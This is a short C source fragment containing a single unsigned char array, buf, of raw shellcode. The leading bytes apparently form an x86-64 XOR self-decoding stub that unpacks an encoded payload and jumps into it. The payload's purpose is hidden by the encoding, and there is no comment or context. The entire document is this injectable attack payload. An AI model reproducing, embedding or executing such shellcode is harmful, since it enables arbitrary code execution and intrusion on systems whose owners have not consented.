unsigned char buf[] = 
"\xeb\x27\x5b\x53\x5f\xb0\xc0\xfc\xae\x75\xfd\x57\x59\x53"
"\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f"
"\x3e\x4f\x74\x07\x80\x3e\xc0\x75\xea\xeb\xe6\xff\xe1\xe8"
"\xd4\xff\xff\xff\x02\xc0\xe9\x25\x59\x51\x5d\xb2\xd6\xfe"
"\xac\x77\xff\x55\x5b\x51\x5c\x88\x04\x32\x05\x4a\xfd\xc5"
"\x4a\xfd\xc4\x64\x83\x3d\x34\xa6\x76\x05\x82\x3c\xd6\x77"
"\xe8\xe9\xe4\xfd\xe3\xea\xd6\xfd\xfd\xfd\x03\xd6\xf4\xe5"
"\x53\x4b\xbc\x62\x70\x6e\x33\x31\x03\x03\x03\x54\x4b\x8a"
"\xe4\xb3\x38\x0c\x06\x34\xa6\x3e\x4f";
